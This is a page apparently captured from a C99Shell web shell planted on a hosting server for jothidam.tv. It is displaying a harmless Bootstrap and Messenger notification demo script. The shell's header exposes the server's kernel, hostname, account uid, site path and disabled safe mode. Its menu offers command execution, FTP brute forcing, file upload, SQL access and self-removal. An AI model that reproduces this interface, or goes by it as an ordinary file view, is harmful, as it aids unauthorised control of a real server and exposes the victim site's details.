!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/home/www/jothidam.tv/admin/js/demo/   drwxr-xr-x
Free 3288.14 GB of 8044.78 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     notifications-demo.js (4.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
//Activates Bootstrap Tooltips/Popovers in Example
$(function() {

    // tooltip demo
    $('.tooltip-demo').tooltip({
        selector: "[data-toggle=tooltip]",
        container: "body"
    })

    $('.tooltip-test').tooltip()
    $('.popover-test').popover()

    // popover demo
    $("[data-toggle=popover]")
        .popover()

})

//Messenger Examples
$("#info-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-right',
        theme: 'flat'
    }

    Messenger().post({
        message: 'This is an example of an info notification. You can close this message using the box to the right.',
        type: 'info',
        showCloseButton: true
    });

});

$("#error-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-right',
        theme: 'flat'
    }
    Messenger().post({
        message: 'This is an example of an error notification. You can close this message using the box to the right.',
        type: 'error',
        showCloseButton: true
    });

});

$("#success-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-right',
        theme: 'flat'
    }

    Messenger().post({
        message: 'This is an example of a success notification. You can close this message using the box to the right.',
        type: 'success',
        showCloseButton: true
    });

});

$("#bottom-right-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-right',
        theme: 'flat'
    }

    Messenger().post({
        message: 'This is an example of a bottom right notification!',
        id: "Only-one-message",
        type: 'success',
        showCloseButton: true
    });

});

$("#bottom-left-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-left',
        theme: 'flat'
    }

    Messenger().post({
        message: 'This is an example of a bottom left notification!',
        id: "Only-one-message",
        type: 'success',
        showCloseButton: true
    });

});

$("#top-right-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-top messenger-on-right',
        theme: 'flat'
    }

    Messenger().post({
        message: 'This is an example of a top right notification!',
        id: "Only-one-message",
        type: 'success',
        showCloseButton: true
    });

});

$("#top-left-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-top messenger-on-left',
        theme: 'flat'
    }

    Messenger().post({
        message: 'This is an example of a top left notification!',
        id: "Only-one-message",
        type: 'success',
        showCloseButton: true
    });

});

$("#cancel-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-right',
        theme: 'flat'
    }

    msg = Messenger().post({
        message: 'You can cancel this message and it will disappear completely.',
        id: "Only-one-message",
        type: 'success',
        showCloseButton: true,
        actions: {
            cancel: {
                action: function() {
                    msg.hide()
                }
            }
        }
    });

});

$("#interactive-message-demo").click(function() {

    Messenger.options = {
        extraClasses: 'messenger-fixed messenger-on-bottom messenger-on-right',
        theme: 'flat'
    }

    msg = Messenger().post({
        message: 'This message in interactive! Cancel this message to see what happens.',
        id: "Only-one-message",
        type: 'error',
        showCloseButton: true,
        actions: {
            cancel: {
                action: function() {
                    msg.update({
                        message: 'Message cancelled!',
                        type: 'success',
                        actions: false
                    })
                }
            }
        }
    });

});

$("#clear-message-demo").click(function() {

    Messenger().hideAll();

});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0103 ]--